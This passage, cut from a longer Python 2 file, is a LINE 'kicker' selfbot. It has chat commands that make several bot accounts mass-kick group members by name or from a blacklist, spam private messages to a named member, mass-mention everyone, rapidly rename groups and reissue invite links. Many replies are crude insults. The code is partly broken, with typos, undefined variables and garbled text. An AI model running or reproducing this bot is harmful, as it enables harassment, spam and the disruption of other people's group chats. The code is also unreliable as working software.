cl.sendText(msg.to,"Already off") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect off 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already off") if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Ini sudah off 􀜁􀇔􏿿👈") else: cl.sendText(msg.to,"Already off") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Protect QR off 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Already off") elif msg.text.lower() == 'auto join off': if wait["autoJoin"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Auto Join Already Off") else: cl.sendText(msg.to,"Auto Join set off") else: wait["autoJoin"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Protect off"]: if wait["protect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: wait["protect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Qrprotect off","qrprotect off"]: if wait["linkprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: wait["linkprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Inviteprotect off"]: if wait["inviteprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: 
wait["inviteprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif msg.text in ["Cancelprotect off"]: if wait["cancelprotect"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"hall ini sudah off ô€œ👈") else: cl.sendText(msg.to,"sudah dimatikan ô€œô€„‰👈") else: wait["cancelprotect"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"already close") else: cl.sendText(msg.to,"It is already open ô€œ👈") elif "Group cancel:" in msg.text: try: strnum = msg.text.replace("Group cancel:","") if strnum == "off": wait["autoCancel"]["on"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Itu off undangan ditolak👈\nSilakan kirim dengan menentukan jumlah orang ketika Anda menghidupkan👈") else: cl.sendText(msg.to,"Off undangan ditolak👈Sebutkan jumlah terbuka ketika Anda ingin mengirim") else: num = int(strnum) wait["autoCancel"]["on"] = True if wait["lang"] == "JP": cl.sendText(msg.to,strnum + "Kelompok berikut yang diundang akan ditolak secara otomatis👈") else: cl.sendText(msg.to,strnum + "The team declined to create the following automatic invitation") except: if wait["lang"] == "JP": kk.sendText(msg.to,"Nilai tidak benar👈") else: cl.sendText(msg.to,"Weird value🛡") elif msg.text in ["Auto leave on","Auto leave: on"]: if wait["leaveRoom"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"on👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Sudah terbuka 􀜁􀇔􏿿") else: wait["leaveRoom"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"Done👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Is already open👈􀜁􀇔􏿿") elif msg.text in ["Auto leave off","Auto leave: off"]: if wait["leaveRoom"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"on👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Sudah off👈􀜁􀇔􏿿") else: wait["leaveRoom"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Done👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"Is already close👈􀜁􀇔􏿿") elif msg.text in ["Share on","share on"]: if wait["timeline"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"Done 􀜁􀇔􏿿") else: cl.sendText(msg.to,"Hal ini sudah terbuka👈") else: wait["timeline"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"on👈") else: cl.sendText(msg.to,"on👈") elif msg.text in ["Share off","share off"]: if wait["timeline"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"Done👈􀜁􀇔􏿿") else: cl.sendText(msg.to,"It is already turned off 􀜁􀇔􏿿👈") else: wait["timeline"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"Off👈") else: cl.sendText(msg.to,"Off👈") elif msg.text.lower() == 'set': md = "" if wait["contact"] == True: md+="􀜁􀇔􏿿 Contact:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Contact:off􀜁􀄰􏿿\n" if wait["autoJoin"] == True: md+="􀜁􀇔􏿿 Auto Join:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Auto Join:off􀜁􀄰􏿿\n" if wait["autoCancel"]["on"] == True:md+="􀜁􀇔􏿿 Auto cancel:" + str(wait["autoCancel"]["members"]) + "􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Group cancel:off 􀜁􀄰􏿿\n" if wait["leaveRoom"] == True: md+="􀜁􀇔􏿿 Auto leave:on 􀜁􀄯􏿿\n" else: md+="􀜁􀇔􏿿 Auto leave:off 􀜁􀄰􏿿\n" if wait["timeline"] == True: md+="􀜁􀇔􏿿 share:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Share:off 􀜁􀄰􏿿\n" if wait["autoAdd"] == True: md+="􀜁􀇔􏿿 Auto add:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto add:off 􀜁􀄰􏿿\n" if wait["commentOn"] == True: md+="􀜁􀇔􏿿 Auto komentar:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Auto komentar:off 􀜁􀄰􏿿\n" if wait["protect"] == True: md+="􀜁􀇔􏿿 Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Protect:off 􀜁􀄰􏿿\n" if wait["linkprotect"] == True: md+="􀜁􀇔􏿿 Link Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Link Protect:off 􀜁􀄰􏿿\n" if wait["inviteprotect"] == True: md+="􀜁􀇔􏿿 Invitation Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Invitation Protect:off 􀜁􀄰􏿿\n" if 
wait["cancelprotect"] == True: md+="􀜁􀇔􏿿 Cancel Protect:on 􀜁􀄯􏿿\n" else:md+="􀜁􀇔􏿿 Cancel Protect:off 􀜁􀄰􏿿\n" cl.sendText(msg.to,md) elif "album merit " in msg.text: if msg.from_ in admin: gid = msg.text.replace("album merit ","") album = cl.getAlbum(gid) if album["result"]["items"] == []: if wait["lang"] == "JP": cl.sendText(msg.to,"There is no album") else: cl.sendText(msg.to,"相册没在。") else: if wait["lang"] == "JP": mg = "The following is the target album" else: mg = "以下是对象的相册" for y in album["result"]["items"]: if "photoCount" in y: mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n" else: mg += str(y["title"]) + ":0sheet\n" cl.sendText(msg.to,mg) elif "album " in msg.text: if msg.from_ in admin: gid = msg.text.replace("album ","") album = cl.getAlbum(gid) if album["result"]["items"] == []: if wait["lang"] == "JP": cl.sendText(msg.to,"There is no album") else: cl.sendText(msg.to,"相册没在。") else: if wait["lang"] == "JP": mg = "The following is the target album" else: mg = "以下是对象的相册" for y in album["result"]["items"]: if "photoCount" in y: mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n" else: mg += str(y["title"]) + ":0sheet\n" elif "album remove " in msg.text: if msg.from_ in admin: gid = msg.text.replace("album remove ","") albums = cl.getAlbum(gid)["result"]["items"] i = 0 if albums != []: for album in albums: cl.deleteAlbum(gid,album["id"]) i += 1 if wait["lang"] == "JP": cl.sendText(msg.to,str(i) + "Deleted albums") else: cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚") elif msg.text in ["Group id","群組全id"]: if msg.from_ in admin: gid = cl.getGroupIdsJoined() h = "" for i in gid: h += "[%s]:%s\n" % (cl.getGroup(i).name,i) cl.sendText(msg.to,h) elif msg.text in ["Cancelall"]: if msg.from_ in admin: gid = cl.getGroupIdsInvited() for i in gid: cl.rejectGroupInvitation(i) if wait["lang"] == "JP": cl.sendText(msg.to,"All invitations have been refused") else: cl.sendText(msg.to,"拒绝了全部的邀请。") elif "album remove→" in msg.text: if msg.from_ in admin: gid = msg.text.replace("album remove→","") albums = cl.getAlbum(gid)["result"]["items"] i = 0 if albums != []: for album in albums: cl.deleteAlbum(gid,album["id"]) i += 1 if wait["lang"] == "JP": cl.sendText(msg.to,str(i) + "Albums deleted") else: cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚") elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]: if msg.from_ in admin: if wait["autoAdd"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"already on") else: cl.sendText(msg.to,"done") else: wait["autoAdd"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了开。") elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]: if msg.from_ in admin: if wait["autoAdd"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"already off") else: cl.sendText(msg.to,"done") else: wait["autoAdd"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了关断。") elif "Message change: " in msg.text: if msg.from_ in admin: wait["message"] = msg.text.replace("Message change: ","") cl.sendText(msg.to,"message changed") elif "Message add: " in msg.text: if msg.from_ in admin: wait["message"] = msg.text.replace("Message add: ","") if wait["lang"] == "JP": cl.sendText(msg.to,"message changed") else: cl.sendText(msg.to,"done。") elif msg.text in ["Message","è‡ªå‹•è¿½åŠ å•å€™èªžç¢ºèª"]: if msg.from_ in admin: if wait["lang"] == "JP": cl.sendText(msg.to,"message change to\n\n" + wait["message"]) else: 
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"]) elif "Comment:" in msg.text: if msg.from_ in admin: c = msg.text.replace("Comment:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"message changed") else: wait["comment"] = c cl.sendText(msg.to,"changed\n\n" + c) elif "Add comment:" in msg.text: if msg.from_ in admin: c = msg.text.replace("Add comment:","") if c in [""," ","\n",None]: cl.sendText(msg.to,"String that can not be changed") else: wait["comment"] = c cl.sendText(msg.to,"changed\n\n" + c) elif msg.text in ["コメンãƒ��:オン","Comment on","Comment:on","自å‹���é¦–é ç•™è¨€ï¼šé–‹"]: if msg.from_ in admin: if wait["commentOn"] == True: if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"already on") else: wait["commentOn"] = True if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了开。") elif msg.text in ["コメント:オフ","Comment on","Comment off","è‡ªå‹•é¦–é ç•™è¨€ï¼šé—œ"]: if msg.from_ in admin: if wait["commentOn"] == False: if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"already off") else: wait["commentOn"] = False if wait["lang"] == "JP": cl.sendText(msg.to,"done") else: cl.sendText(msg.to,"要了关断。") elif msg.text in ["Comment","留言確認"]: if msg.from_ in admin: cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"])) elif msg.text in ["Gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False cl.updateGroup(x) gurl = cl.reissueGroupTicket(msg.to) cl.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv1 gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False ki.updateGroup(x) gurl = ki.reissueGroupTicket(msg.to) ki.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv2 gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False kk.updateGroup(x) gurl = kk.reissueGroupTicket(msg.to) kk.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Cv3 gurl"]: if msg.from_ in admin: if msg.toType == 2: x = cl.getGroup(msg.to) if x.preventJoinByTicket == True: x.preventJoinByTicket = False kc.updateGroup(x) gurl = kc.reissueGroupTicket(msg.to) kc.sendText(msg.to,"line://ti/g/" + gurl) else: if wait["lang"] == "JP": cl.sendText(msg.to,"Can't be used outside the group") else: cl.sendText(msg.to,"Not for use less than group") elif msg.text in ["Comment bl "]: if msg.from_ in admin: wait["wblack"] = True cl.sendText(msg.to,"add to comment bl") elif msg.text in ["Comment wl "]: if msg.from_ in admin: wait["dblack"] = True cl.sendText(msg.to,"wl to comment bl") elif msg.text in ["Comment bl confirm"]: if msg.from_ in admin: if wait["commentBlack"] == {}: cl.sendText(msg.to,"confirmed") else: cl.sendText(msg.to,"Blacklist") mc = "" for mi_d in wait["commentBlack"]: mc += "" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text in ["Jam on"]: if msg.from_ in admin: if 
wait["clock"] == True: cl.sendText(msg.to,"already on") else: wait["clock"] = True now2 = datetime.now() nowT = datetime.strftime(now2,"(%H:%M)") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"done") elif msg.text in ["Jam off"]: if msg.from_ in admin: if wait["clock"] == False: cl.sendText(msg.to,"already off") else: wait["clock"] = False cl.sendText(msg.to,"done") elif msg.text in ["Change clock "]: if msg.from_ in admin: n = msg.text.replace("Change clock ","") if len(n.decode("utf-8")) > 13: cl.sendText(msg.to,"changed") else: wait["cName"] = n cl.sendText(msg.to,"changed to\n\n" + n) elif msg.text in ["Up"]: if msg.from_ in admin: if wait["clock"] == True: now2 = datetime.now() nowT = datetime.strftime(now2,"(%H:%M)") profile = cl.getProfile() profile.displayName = wait["cName"] + nowT cl.updateProfile(profile) cl.sendText(msg.to,"Updated") else: cl.sendText(msg.to,"Please turn on the name clock") elif msg.text == "cek": if msg.from_ in admin: cl.sendText(msg.to, "Check sider") try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] except: pass wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['ROM'][msg.to] = {} print wait2 elif msg.text == "Result": if msg.from_ in admin: if msg.to in wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: chiya = "" else: chiya = "" for rom in wait2["ROM"][msg.to].items(): print rom chiya += rom[1] + "\n" cl.sendText(msg.to, "Readed By %s\nthat's it\n\nignored By\n%sIt is abnormal ♪\n\nReading point creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to])) else: cl.sendText(msg.to, "An already read point has not been set.\n「set」you can send ♪ read point will be created ♪") #----------------------------------------------- #----------------------------------------------- elif msg.text in ["Masuk","Jarvis"]: if msg.from_ in admin: G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = True cl.updateGroup(G) invsend = 0 Ticket = cl.reissueGroupTicket(msg.to) ki.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.2) kk.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.2) kc.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.2) G = cl.getGroup(msg.to) G.preventJoinByTicket = True ki.updateGroup(G) print "kicker ok" G.preventJoinByTicket(G) ki.updateGroup(G) elif msg.text in ["Cv1 join"]: if msg.from_ in admin: X = cl.getGroup(msg.to) X.preventJoinByTicket = True cl.updateGroup(X) invsend = 0 Ti = cl.reissueGroupTicket(msg.to) ki.acceptGroupInvitationByTicket(msg.to,Ti) G = kk.getGroup(msg.to) G.preventJoinByTicket = True ki.updateGroup(G) Ticket = kk.reissueGroupTicket(msg.to) elif msg.text in ["Cv2 join"]: if msg.from_ in admin: X = cl.getGroup(msg.to) X.preventJoinByTicket = False cl.updateGroup(X) invsend = 0 Ti = cl.reissueGroupTicket(msg.to) kk.acceptGroupInvitationByTicket(msg.to,Ti) G = ki.getGroup(msg.to) G.preventJoinByTicket = True kk.updateGroup(G) Ticket = kk.reissueGroupTicket(msg.to) #----------------------------------------------- #.acceptGroupInvitationByTicket(msg.to,Ticket) elif msg.text in ["Cv3 join"]: if msg.from_ in admin: G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = False cl.updateGroup(G) invsend = 0 Ticket = cl.reissueGroupTicket(msg.to) kc.acceptGroupInvitationByTicket(msg.to,Ticket) print "kicker ok" G.preventJoinByTicket = True kc.updateGroup(G) #----------------------------------------------- elif msg.text in 
["Out","out"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: bot1.leaveGroup(msg.to) bot2.leaveGroup(msg.to) bot3.leaveGroup(msg.to) bot4.leaveGroup(msg.to) except: pass elif msg.text in ["Bye 1"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: ki.leaveGroup(msg.to) except: pass elif msg.text in ["Bye 2"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: ki.leaveGroup(msg.to) kk.leaveGroup(msg.to) except: pass elif msg.text in ["Cv1 @bye"]: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: ki.leaveGroup(msg.to) except: pass elif msg.text in ["Cv2 @bye"]: if msg.from_ in admin: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: kk.leaveGroup(msg.to) except: pass elif msg.text in ["Cv3 @bye"]: if msg.toType == 2: ginfo = cl.getGroup(msg.to) try: kc.leaveGroup(msg.to) except: pass #----------------------------------------------- elif msg.text in ["Mentionall"]: if msg.from_ in admin: group = cl.getGroup(msg.to) nama = [contact.mid for contact in group.members] cb = "" cb2 = "" strt = int(0) akh = int(0) for md in nama: akh = akh + int(5) cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},""" strt = strt + int(6) akh = akh + 1 cb2 += "@nrik\n" cb = (cb[:int(len(cb)-1)]) msg.contentType = 0 msg.text = cb2 msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'} try: kk.sendMessage(msg) except Exception as error: print error #----------------------------------------------- elif ms.text in ["Kill"]: if msg.from_ in admin: if msg.toType == 2: group = ki.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: kk.sendText(msg.to,"Fuck You") kc.sendText(msg.to,"Fuck You") return for jj in matched_list: try: klist=[ki,kk,kc] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[jj]) print (msg.to,[jj]) except: pass elif "Cleanse" in msg.text: if msg.from_ in admin: if msg.toType == 2: print "ok" _name = msg.text.replace("Cleanse","") gs = ki.getGroup(msg.to) gs = kk.getGroup(msg.to) gs = kc.getGroup(msg.to) ki.sendText(msg.to,"Just some casual cleansing ô") kk.sendText(msg.to,"Group cleansed.") targets = [] for g in gs.members: if _name in g.displayName: targets.append(g.mid) if targets == []: ki.sendText(msg.to,"Not found.") kk.sendText(msg.to,"Not found.") else: for target in targets: try: klist=[ki,kk,kc] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: ki.sendText(msg.to,"Group cleanse") kk.sendText(msg.to,"Group cleanse") elif "Nk " in msg.text: if msg.from_ in admin: if msg.from_ in admin: nk0 = msg.text.replace("Nk ","") nk1 = nk0.lstrip() nk2 = nk1.replace("@","") nk3 = nk2.rstrip() _name = nk3 gs = cl.getGroup(msg.to) targets = [] for s in gs.members: if _name in s.displayName: targets.append(s.mid) if targets == []: sendMessage(msg.to,"user does not exist") pass else: for target in targets: try: klist=[cl,ki,kk,kc] kicker=random.choice(klist) kicker.kickoutFromGroup(msg.to,[target]) print (msg.to,[g.mid]) except: ki.sendText(msg.to,"Succes Cv") kk.sendText(msg.to,"Fuck You") elif "Blacklist @ " in msg.text: if msg.from_ in admin: _name = msg.text.replace("Blacklist @ ","") _kicktarget = _name.rstrip(' ') gs = ki2.getGroup(msg.to) targets = [] for g in gs.members: if _kicktarget == g.displayName: targets.append(g.mid) if targets == []: 
cl.sendText(msg.to,"Not found") else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) k3.sendText(msg.to,"Succes Cv") except: ki.sendText(msg.to,"error") elif "Ban @" in msg.text: if msg.from_ in admin: if msg.toType == 2: print "[Ban]ok" _name = msg.text.replace("Ban @","") _nametarget = _name.rstrip(' ') gs = ki.getGroup(msg.to) gs = kk.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: ki.sendText(msg.to,"Not found 􀜁􀅔Har Har􏿿") else: for target in targets: try: wait["blacklist"][target] = True f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) ki.sendText(msg.to,"Succes 􀜁􀅔Har Har􏿿") except: ki.sendText(msg.to,"Error") elif "Unban @" in msg.text: if msg.from_ in admin: if msg.toType == 2: print "[Unban]ok" _name = msg.text.replace("Unban @","") _nametarget = _name.rstrip(' ') gs = ki.getGroup(msg.to) gs = kk.getGroup(msg.to) gs = kc.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: ki.sendText(msg.to,"Not found 􀜁􀅔Har Har􏿿") kk.sendText(msg.to,"Not found 􀜁􀅔Har Har􏿿") else: for target in targets: try: del wait["blacklist"][target] f=codecs.open('st2__b.json','w','utf-8') json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False) ki.sendText(msg.to,"Succes 􀜁􀅔Har Har􏿿") except: ki.sendText(msg.to,"Succes 􀜁􀅔Har Har􏿿") #----------------------------------------------- elif msg.text in ["Gua Mau Masuk Team Kamu"]: cl.sendText(msg.to,"Silakan Masuk http://line.me/R/ti/g/OTsF9L6bzv Jangan Hack ya Kak") #----------------------------------------------- elif msg.text in ["About","Own"]: ki.sendText(msg.to,"Owner : line.me/ti/p/~naufal_opalminecraft") #----------------------------------------------- elif msg.text in ["hmm"]: ki.sendText(msg.to,"Indro ama aby homoan gue") elif msg.text in [":v"]: ki.sendText(msg.to,"apasih sayang") elif msg.text in ["wkwkwk"]: ki.sendText(msg.to,"The Cyber Kicker the best ler") elif msg.text in ["tommy"]: ki.sendText(msg.to,"Tommy pekok 􀜁􀅔Har Har􏿿") kk.sendText(msg.to,"Tommy pekok 􀜁􀅔Har Har􏿿") kc.sendText(msg.to,"Tommy pekok 􀜁􀅔Har Har􏿿") elif msg.text in ["#welcome"]: ki.sendText(msg.to,"Selamat datang di Grup jones") kk.sendText(msg.to,"Jangan nakal ok!") #----------------------------------------------- elif msg.text in ["PING","Ping","ping","Samlekom","samlekom"]: ki.sendText(msg.to,"Mamanx 􀜁􀅔Har Har􏿿") kk.sendText(msg.to,"Ngentod 􀜁􀅔Har Har􏿿") kc.sendText(msg.to,"Yuuk 􀜁􀅔Har Har􏿿") #----------------------------------------------- elif msg.text in ["Responsename","responsename"]: if msg.from_ in admin: cl.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot1.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot2.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot3.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") bot4.sendText(msg.to,"Siap Bos 􀜁􀅔Har Har􏿿") #----------------------------------------------- elif msg.text == "Setlastpoint": if msg.from_ in admin: cl.sendText(msg.to, "ƧЄƬ ƬHЄ ԼƛƧƬƧЄЄƝƧ' ƤƠƖƝƬ(`・ω・´)") try: del wait2['readPoint'][msg.to] del wait2['readMember'][msg.to] except: pass now2 = datetime.now() wait2['readPoint'][msg.to] = msg.id wait2['readMember'][msg.to] = "" wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M") wait2['ROM'][msg.to] = {} print wait2 elif msg.text == "Viewlastseen": if msg.from_ in admin: if msg.to in 
wait2['readPoint']: if wait2["ROM"][msg.to].items() == []: chiya = "" else: chiya = "" for rom in wait2["ROM"][msg.to].items(): print rom chiya += rom[1] + "\n" cl.sendText(msg.to, " %s\n\n\nPeople who have ignored reads\n(`・ω・´)\n%s\n\nThese anu anu uesrs have seen at the lastseen point(`・ω・´)\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to])) else: cl.sendText(msg.to, "Sider ga bisa di read cek setpoint dulu bego tinggal ketik\nSetlastpoint\nkalo mau liat sider ketik\nViewlastseen") #----------------------------------------------- elif msg.text in ["Sp","Speed","speed"]: if msg.from_ in admin: start = time.time() cl.sendText(msg.to, "Tunggu Napa...") elapsed_time = time.time() - start cl.sendText(msg.to, "%sseconds" % (elapsed_time)) #------------------------------------------------------------------ elif msg.text in ["Ban"]: if msg.from_ in admin: wait["wblacklist"] = True cl.sendText(msg.to,"send contact") elif msg.text in ["Unban"]: if msg.from_ in admin: wait["dblacklist"] = True cl.sendText(msg.to,"send contact") elif msg.text in ["Banlist"]: if msg.from_ in admin: if wait["blacklist"] == {}: cl.sendText(msg.to,"nothing") else: cl.sendText(msg.to,"Blacklist user") mc = "" for mi_d in wait["blacklist"]: mc += "->" +cl.getContact(mi_d).displayName + "\n" cl.sendText(msg.to,mc) elif msg.text in ["Cek ban"]: if msg.from_ in admin: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) cocoa = "" for mm in matched_list: cocoa += mm + "\n" cl.sendText(msg.to,cocoa + "") elif msg.text in ["Kill ban"]: if msg.from_ in admin: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.members] matched_list = [] for tag in wait["blacklist"]: matched_list+=filter(lambda str: str == tag, gMembMids) if matched_list == []: cl.sendText(msg.to,"There was no blacklist user") return for jj in matched_list: cl.kickoutFromGroup(msg.to,[jj]) cl.sendText(msg.to,"wkwkw 􀜁􀅔Har Har􏿿") elif msg.text in ["Clear"]: if msg.from_ in admin: if msg.toType == 2: group = cl.getGroup(msg.to) gMembMids = [contact.mid for contact in group.invitee] for _mid in gMembMids: cl.cancelGroupInvitation(msg.to,[_mid]) cl.sendText(msg.to,"I pretended to cancel and canceled.") elif "random:" in msg.text: if msg.from_ in admin: if msg.toType == 2: strnum = msg.text.replace("random:","") source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|' try: num = int(strnum) group = cl.getGroup(msg.to) for var in range(0,num): name = "".join([random.choice(source_str) for x in xrange(10)]) time.sleep(0.01) group.name = name cl.updateGroup(group) except: cl.sendText(msg.to,"Error") elif "album→" in msg.text: if msg.from_ in admin: try: albumtags = msg.text.replace("album→","") gid = albumtags[:6] name = albumtags.replace(albumtags[:34],"") cl.createAlbum(gid,name) cl.sendText(msg.to,name + "created an album") except: cl.sendText(msg.to,"Error") elif "fakec→" in msg.text: if msg.from_ in admin: try: source_str = 'abcdefghijklmnopqrstuvwxyz1234567890@:;./_][!&%$#)(=~^|' name = "".join([random.choice(source_str) for x in xrange(10)]) anu = msg.text.replace("fakec→","") cl.sendText(msg.to,str(cl.channel.createAlbum(msg.to,name,anu))) except Exception as e: try: cl.sendText(msg.to,str(e)) except: pass #-------------Fungsi Tagall User Start---------------# elif msg.text in ["Tag all"]: if msg.from_ in admin: group = cl.getGroup(msg.to) nama 
= [contact.mid for contact in group.members] cb = "" cb2 = "" strt = int(0) akh = int(0) for md in nama: akh = akh + int(6) cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},""" strt = strt + int(7) akh = akh + 1 cb2 += "@nrik \n" cb = (cb[:int(len(cb)-1)]) msg.contentType = 0 msg.text = cb2 msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'} try: ki.sendMessage(msg) except Exception as error: print error #-------------Fungsi Tagall User Finish By :Naufal -------------# elif "Contact bc " in msg.text: if msg.from_ in admin: bctxt = msg.text.replace("Contact bc ", "") t = cl.getAllContactIds() t = 5 while(t): cl.sendText(msg.to, (bctxt)) t-=1 elif msg.text in ["Aby"]: ki.sendText(msg.to,"Homoan gue muehehe") elif "Spamcontact @" in msg.text: _name = msg.text.replace("Spamcontact @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot1.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot2.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot3.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") bot4.sendText(g.mid,"ANJAYYYYYYYYYYYYYYY") 